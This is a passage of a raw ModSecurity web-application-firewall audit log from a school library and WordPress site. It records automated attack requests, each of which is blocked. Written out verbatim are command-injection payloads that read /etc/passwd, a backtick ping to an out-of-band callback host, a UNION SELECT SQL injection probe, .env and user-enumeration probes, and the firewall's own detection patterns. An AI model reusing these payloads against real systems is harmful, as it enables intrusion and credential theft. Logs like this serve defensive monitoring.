8181 --01cc9a5b-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 161474787 --01cc9a5b-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --01cc9a5b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01cc9a5b-E-- --01cc9a5b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801160305043 1691 (- - -) Stopwatch2: 1747801160305043 1691; combined=576, p1=375, p2=173, p3=0, p4=0, p5=27, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01cc9a5b-Z-- --0f948d29-A-- [21/May/2025:11:19:20 +0700] aC1USCioYDAgD0WHUjSnbQAAAE8 103.236.140.4 41488 103.236.140.4 8181 --0f948d29-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788462 --0f948d29-C-- whatever-content --0f948d29-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f948d29-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747801160320372 5390 (- - -) Stopwatch2: 1747801160320372 5390; combined=3981, p1=362, p2=3534, p3=21, p4=25, p5=39, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f948d29-Z-- --e6eef26d-A-- [21/May/2025:11:19:21 +0700] aC1USYv3pT1iV0OxjLTn2wAAAJI 103.236.140.4 41496 103.236.140.4 8181 --e6eef26d-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 164788465 --e6eef26d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e6eef26d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801161142375 2256 (- - -) Stopwatch2: 1747801161142375 2256; combined=898, p1=387, p2=477, p3=0, p4=0, p5=34, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6eef26d-Z-- --32bd0878-A-- [21/May/2025:11:19:22 +0700] aC1USov3pT1iV0OxjLTn3QAAAIM 103.236.140.4 41502 103.236.140.4 8181 --32bd0878-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 164788468 --32bd0878-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --32bd0878-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801162098505 2559 (- - -) Stopwatch2: 1747801162098505 2559; combined=1347, p1=342, p2=977, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32bd0878-Z-- --97f2a875-A-- [21/May/2025:11:29:01 +0700] aC1WjYv3pT1iV0OxjLTn7QAAAJc 103.236.140.4 41568 103.236.140.4 8181 --97f2a875-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.46.219.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.46.219.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --97f2a875-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97f2a875-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801741983740 2659 (- - -) Stopwatch2: 1747801741983740 2659; combined=1331, p1=444, p2=856, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97f2a875-Z-- --4dfd8b09-A-- [21/May/2025:11:40:16 +0700] aC1ZMIv3pT1iV0OxjLTn8wAAAI0 103.236.140.4 41618 103.236.140.4 8181 --4dfd8b09-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --4dfd8b09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dfd8b09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747802416547801 865 (- - -) Stopwatch2: 1747802416547801 865; combined=339, p1=291, p2=0, p3=0, p4=0, p5=47, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dfd8b09-Z-- --e7d0ea37-A-- [21/May/2025:11:54:12 +0700] aC1cdHZGSt58M5vv3glyygAAAA0 103.236.140.4 41712 103.236.140.4 8181 --e7d0ea37-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Accept-Charset: utf-8 --e7d0ea37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7d0ea37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747803252621177 785 (- - -) Stopwatch2: 1747803252621177 785; combined=331, p1=296, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7d0ea37-Z-- --574a4a3c-A-- [21/May/2025:11:54:18 +0700] aC1cenZGSt58M5vv3glyywAAAA4 103.236.140.4 41714 103.236.140.4 8181 --574a4a3c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --574a4a3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --574a4a3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747803258792522 2774 (- - -) Stopwatch2: 1747803258792522 2774; combined=1253, p1=379, p2=845, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --574a4a3c-Z-- --de5fe03e-A-- [21/May/2025:12:03:53 +0700] aC1euYv3pT1iV0OxjLToDAAAAIQ 103.236.140.4 41742 103.236.140.4 8181 --de5fe03e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.169.148.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.169.148.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de5fe03e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de5fe03e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747803833299035 3061 (- - -) Stopwatch2: 1747803833299035 3061; combined=1396, p1=461, p2=903, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de5fe03e-Z-- --83083005-A-- [21/May/2025:12:10:53 +0700] aC1gXYv3pT1iV0OxjLToFgAAAIA 103.236.140.4 41786 103.236.140.4 8181 --83083005-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 131.196.4.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 131.196.4.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --83083005-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83083005-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747804253959791 2911 (- - -) Stopwatch2: 1747804253959791 2911; combined=1263, p1=462, p2=770, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83083005-Z-- --0d79de1e-A-- [21/May/2025:12:13:26 +0700] aC1g9ov3pT1iV0OxjLToHAAAAIw 103.236.140.4 41810 103.236.140.4 8181 --0d79de1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --0d79de1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d79de1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747804406961708 724 (- - -) Stopwatch2: 1747804406961708 724; combined=313, p1=275, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d79de1e-Z-- --cf2f1f01-A-- [21/May/2025:12:13:31 +0700] aC1g-xpv_mIXt2pDBOoHUAAAAMs 103.236.140.4 41812 103.236.140.4 8181 --cf2f1f01-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.88.97.14 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.88.97.14 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --cf2f1f01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf2f1f01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747804411835636 832 (- - -) Stopwatch2: 1747804411835636 832; combined=337, p1=295, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf2f1f01-Z-- --b8d5fb29-A-- [21/May/2025:12:32:49 +0700] aC1lgYv3pT1iV0OxjLToKwAAAJY 103.236.140.4 41892 103.236.140.4 8181 --b8d5fb29-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0mbkqa4kqtm561jt3n04zxwz7opnb1g5.oast.fun%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Debian; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 167545659 --b8d5fb29-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b8d5fb29-E-- --b8d5fb29-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0mbkqa4kqtm561jt3n04zxwz7opnb1g5.oast.fun`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747805569136011 2156 (- - -) Stopwatch2: 1747805569136011 2156; combined=608, p1=430, p2=146, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8d5fb29-Z-- --fe46f421-A-- [21/May/2025:12:32:49 +0700] aC1lgYv3pT1iV0OxjLToLAAAAIY 103.236.140.4 41892 103.236.140.4 8181 --fe46f421-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 164788588 --fe46f421-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --fe46f421-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe46f421-E-- --fe46f421-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1747805569166297 2529 (- - -) Stopwatch2: 1747805569166297 2529; combined=1541, p1=363, p2=1149, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe46f421-Z-- --e2787574-A-- [21/May/2025:12:32:50 +0700] aC1lgiioYDAgD0WHUjSngAAAAEM 103.236.140.4 41906 103.236.140.4 8181 --e2787574-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: uid=1234123 X-Varnish: 167545665 --e2787574-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --e2787574-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2787574-E-- --e2787574-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747805570110537 1828 (- - -) Stopwatch2: 1747805570110537 1828; combined=569, p1=377, p2=165, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2787574-Z-- --772ec845-A-- [21/May/2025:12:36:50 +0700] aC1mcov3pT1iV0OxjLToNQAAAJU 103.236.140.4 41944 103.236.140.4 8181 --772ec845-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.74.206.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.74.206.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --772ec845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --772ec845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747805810438780 3126 (- - -) Stopwatch2: 1747805810438780 3126; combined=1397, p1=483, p2=883, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --772ec845-Z-- --476c737a-A-- 